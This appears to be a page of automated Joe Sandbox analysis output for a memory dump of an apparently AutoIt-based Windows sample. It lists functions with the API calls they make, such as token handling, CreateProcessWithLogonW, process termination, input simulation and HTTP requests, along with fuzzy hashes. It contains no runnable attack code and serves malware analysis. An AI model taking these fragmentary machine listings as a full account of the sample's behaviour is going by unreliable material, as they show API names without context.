Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: aadc74168fefbc0ed1028fff5a669f5bf72dba75f72d99928067b08253db1583
Instruction ID: f31817b7ac059500df6319d66869796d771de6b0eb207f813e6ad7fb7b400a7d
Opcode Fuzzy Hash: aadc74168fefbc0ed1028fff5a669f5bf72dba75f72d99928067b08253db1583
Instruction Fuzzy Hash: 2231B272509306ABD720DF14C849F9BBBE9FF88314F000929F585A7191DB74EA59CB92

Function 00AF8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF80C0
Part of subcall function 00AF80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF80CA
Part of subcall function 00AF80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF80D9
Part of subcall function 00AF80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF80E0
Part of subcall function 00AF80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF80F6

GetLengthSid.ADVAPI32(?,00000000,00AF842F), ref: 00AF88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AF88D6
HeapAlloc.KERNEL32(00000000), ref: 00AF88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00AF88F6
GetProcessHeap.KERNEL32(00000000,00000000,00AF842F), ref: 00AF890A
HeapFree.KERNEL32(00000000), ref: 00AF8911

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: c1f735a04ed2a93427a8edc33cd912f86456917a4c3c0e80026a74cfb4a4ccfa
Instruction ID: c239eb1dfc2473b0b710f080484bc1ae3101f2a53fdc3d416b8d4edb0d351eb6
Opcode Fuzzy Hash: c1f735a04ed2a93427a8edc33cd912f86456917a4c3c0e80026a74cfb4a4ccfa
Instruction Fuzzy Hash: BD11AF31501209FFDB209FE4DC4ABBE7B78EB45352F504028FA85A7110CB7A9911DB60

Function 00AF85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AF85E2
OpenProcessToken.ADVAPI32(00000000), ref: 00AF85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AF85F8
CloseHandle.KERNEL32(00000004), ref: 00AF8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00AF8646

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 4cd5d600ffb9933d491e1637589591ff2384c2b582a66c558606ed73e5ea983f
Instruction ID: 8f7c0ec357756ea1c644f4be1bac4775852646cad407846ec78e30052406a053
Opcode Fuzzy Hash: 4cd5d600ffb9933d491e1637589591ff2384c2b582a66c558606ed73e5ea983f
Instruction Fuzzy Hash: 2E11477250024EABDF118FE4DD49FEA7BB9EB08704F044065FE04A2160CA768D61AB60

Function 00AFB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00AFB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00AFB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AFB7CD
ReleaseDC.USER32(00000000,00000000), ref: 00AFB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AFB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00AFB7FE

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: fbd505c3fdfd6070ce66044e9825607cc38c8c2a0f655a1d6299464e8e009c89
Instruction ID: 391492c5ff16790ecf3cdcc1b5ee9509c4127868bd06052ffe27e6642a700dd9
Opcode Fuzzy Hash: fbd505c3fdfd6070ce66044e9825607cc38c8c2a0f655a1d6299464e8e009c89
Instruction Fuzzy Hash: 3A014475E00219BBEB10AFE6DD45E6EBFB8EB48751F004075FA04A7291DA709C11CFA1

Function 00AC0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC01C1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 1f62baeddc988a5fe02822317f03e351965fa8db0ff0affc6d9cedbc6c8612db
Instruction ID: 21afb50e52fba53bee43e2a9cefefd3fb430543e312957eb481af45e2e82bf75
Opcode Fuzzy Hash: 1f62baeddc988a5fe02822317f03e351965fa8db0ff0affc6d9cedbc6c8612db
Instruction Fuzzy Hash: 7D016CB090275A7DE3008F5A8C85B52FFB8FF19354F00411BA15C47941C7F5A868CBE5

Function 00B053E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B053F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B0540F
GetWindowThreadProcessId.USER32(?,?), ref: 00B0541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B05437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0543E

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5172d70984c88d872df5d6293865695662354c02c463190949f207f26bec624d
Instruction ID: b9754f1108b115233f340981fd952a2ceba96d55171bd1bef65db3548f9668a5
Opcode Fuzzy Hash: 5172d70984c88d872df5d6293865695662354c02c463190949f207f26bec624d
Instruction Fuzzy Hash: CAF01231541559BBD7315B929C0DEFF7A7CEBCAB11F000179F904D20519AA51A12C6B5

Function 00B07230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00B07243
EnterCriticalSection.KERNEL32(?,?,00AB0EE4,?,?), ref: 00B07254
TerminateThread.KERNEL32(00000000,000001F6,?,00AB0EE4,?,?), ref: 00B07261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AB0EE4,?,?), ref: 00B0726E

Part of subcall function 00B06C35: CloseHandle.KERNEL32(00000000,?,00B0727B,?,00AB0EE4,?,?), ref: 00B06C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00B07281
LeaveCriticalSection.KERNEL32(?,?,00AB0EE4,?,?), ref: 00B07288

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ee100aad1b349d81583a1e67760f2f5ad310af38ecb2bdceab8960df5e75f309
Instruction ID: 24dd9cfc503f57cc3aecd68fcd04778a9643eac27228feaa12d11107eacfeb44
Opcode Fuzzy Hash: ee100aad1b349d81583a1e67760f2f5ad310af38ecb2bdceab8960df5e75f309
Instruction Fuzzy Hash: B8F05E36945613EBEB611B64EE4C9FA7B79FF4A702B500571F503A20A4CF7A5812CF50

Function 00AF8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF899D
UnloadUserProfile.USERENV(?,?), ref: 00AF89A9
CloseHandle.KERNEL32(?), ref: 00AF89B2
CloseHandle.KERNEL32(?), ref: 00AF89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00AF89C3
HeapFree.KERNEL32(00000000), ref: 00AF89CA

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 28a738d79a816f42713fafd7971e3a1ada91132baa0a66e2ed049b64e7466006
Instruction ID: 6e5791723e9262b0151ee06415fae2be550f3cd7c88d0286fc65a24ac4b21ea2
Opcode Fuzzy Hash: 28a738d79a816f42713fafd7971e3a1ada91132baa0a66e2ed049b64e7466006
Instruction Fuzzy Hash: 83E0C236004002FBDA115FE1ED0C92ABB79FB89322B508230F22992070CF329432DB50

Function 00B185ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B18613
CharUpperBuffW.USER32(?,?), ref: 00B18722
VariantClear.OLEAUT32(?), ref: 00B1889A

Part of subcall function 00B07562: VariantInit.OLEAUT32(00000000), ref: 00B075A2
Part of subcall function 00B07562: VariantCopy.OLEAUT32(00000000,?), ref: 00B075AB
Part of subcall function 00B07562: VariantClear.OLEAUT32(00000000), ref: 00B075B7

Strings

AUTOIT.ERROR, xrefs: 00B18728
Incorrect Parameter format, xrefs: 00B1864B, 00B1880D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 9c3160f94d530d738a80b5785c5b041a040a65eb45d692d4a4a802827547cc95
Instruction ID: 8b47466cbbbc03ffa899c11193b226bc61a77accd86438900d30cce9f759b866
Opcode Fuzzy Hash: 9c3160f94d530d738a80b5785c5b041a040a65eb45d692d4a4a802827547cc95
Instruction Fuzzy Hash: FC917C706043019FC710DF24C5859ABBBE4FF89714F5489AEF89A8B3A1DB30E945CB92

Function 00B02A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ABFC86: _wcscpy.LIBCMT ref: 00ABFCA9

_memset.LIBCMT ref: 00B02B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B02BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B02C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B02C97

Strings

0, xrefs: 00B02B73

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: dca26d75e32a2a8439bfc38bda6f5678228848cdcd6daeb9c19c960c04074785
Instruction ID: 3db74711af619fdcdb459d7b879736349e28ce28ed21cfd34c15e504c335f0c9
Opcode Fuzzy Hash: dca26d75e32a2a8439bfc38bda6f5678228848cdcd6daeb9c19c960c04074785
Instruction Fuzzy Hash: 9E51CD716083019EE7349F28C889A6FBBE8EF59354F140AADF895D32D1DB70CC488B52

Function 00AFD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AFD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AFD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AFD69D

Strings

DllGetClassObject, xrefs: 00AFD610

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 73d817e5232f17b762ac89e8f9093e8ba972add2552b969952294a3096cf560a
Instruction ID: 1504848607f3076d520da9df341babcb4cb840aeb95bcfaa8d53280308cb33fb
Opcode Fuzzy Hash: 73d817e5232f17b762ac89e8f9093e8ba972add2552b969952294a3096cf560a
Instruction Fuzzy Hash: D641A5B1610208EFDB16DF94C884AAA7BBAEF44310F1581A9FE09DF205D7B1DD44DBA0

Function 00B02753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B027C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B027DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00B02822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B65890,00000000), ref: 00B0286B

Strings

0, xrefs: 00B027B5

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: cd1fb6feac5cd5ac7975a934814f9e54963af26e8d6af386900794773231ac45
Instruction ID: 4e7ea27fed880ba8a749eac711f25816fa5a1dc57a8a5b2a27f49fe6da19296c
Opcode Fuzzy Hash: cd1fb6feac5cd5ac7975a934814f9e54963af26e8d6af386900794773231ac45
Instruction Fuzzy Hash: 03418E752043419FD724DF24C889B2ABFE8EF85314F148AADF9A5972D1DB30E909CB52

Function 00B1D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1D7C5

Part of subcall function 00AA784B: _memmove.LIBCMT ref: 00AA7899

Strings

winapi, xrefs: 00B1D836
none, xrefs: 00B1D8A0
stdcall, xrefs: 00B1D847
cdecl, xrefs: 00B1D81C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 4c15ee387114b24c054e0896740aa55c531f1b5ab8f3d704ccf646ec39741907
Instruction ID: 611f43c6472b75fe3a7d96c3472a56d293fe7e61b5900380124f1e31cce55db1
Opcode Fuzzy Hash: 4c15ee387114b24c054e0896740aa55c531f1b5ab8f3d704ccf646ec39741907
Instruction Fuzzy Hash: D5317E71904619EBCF00EF68CD51AEEB3F5FF05320B5086A9E835976D1DB71A945CB80

Function 00AF8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AF8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AF8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00AF8F57

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Strings

ComboBox, xrefs: 00AF8E9E
ListBox, xrefs: 00AF8ED3

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 848dc94395466b4636b0b462f5ddfaab216f00e3e9d9abb6d241c1a1393c5e65
Instruction ID: 2d4a56b575100ee3282b07770d3c77437120fa84d205072d2384b91c613f324f
Opcode Fuzzy Hash: 848dc94395466b4636b0b462f5ddfaab216f00e3e9d9abb6d241c1a1393c5e65
Instruction Fuzzy Hash: 3621E171A04108BEDB15ABF0DC85DFFB7B9DF16360B144529F925A72E1DF39480AD620

Function 00B1182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B11872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B118A2
InternetCloseHandle.WININET(00000000), ref: 00B118E9

Part of subcall function 00B12483: GetLastError.KERNEL32(?,?,00B11817,00000000,00000000,00000001), ref: 00B12498
Part of subcall function 00B12483: SetEvent.KERNEL32(?,?,00B11817,00000000,00000000,00000001), ref: 00B124AD

Strings

, xrefs: 00B11893

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 470d5af5fe43e689f748a5b00599cdd95ad2f553896b4218b183a133ae18f83f
Instruction ID: 8ce422e09982a210e1e749447845c6472df8cd2cacd276c456f86bcba429b9e1
Opcode Fuzzy Hash: 470d5af5fe43e689f748a5b00599cdd95ad2f553896b4218b183a133ae18f83f
Instruction Fuzzy Hash: 08217CB1500208BFEB219F689C85EFF76EDEB48B44F50856AFA05E7240EA209D4597B1

Function 00B263E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B26461
LoadLibraryW.KERNEL32(?), ref: 00B26468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B2647D
DestroyWindow.USER32(?), ref: 00B26485

Strings

SysAnimate32, xrefs: 00B2643C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
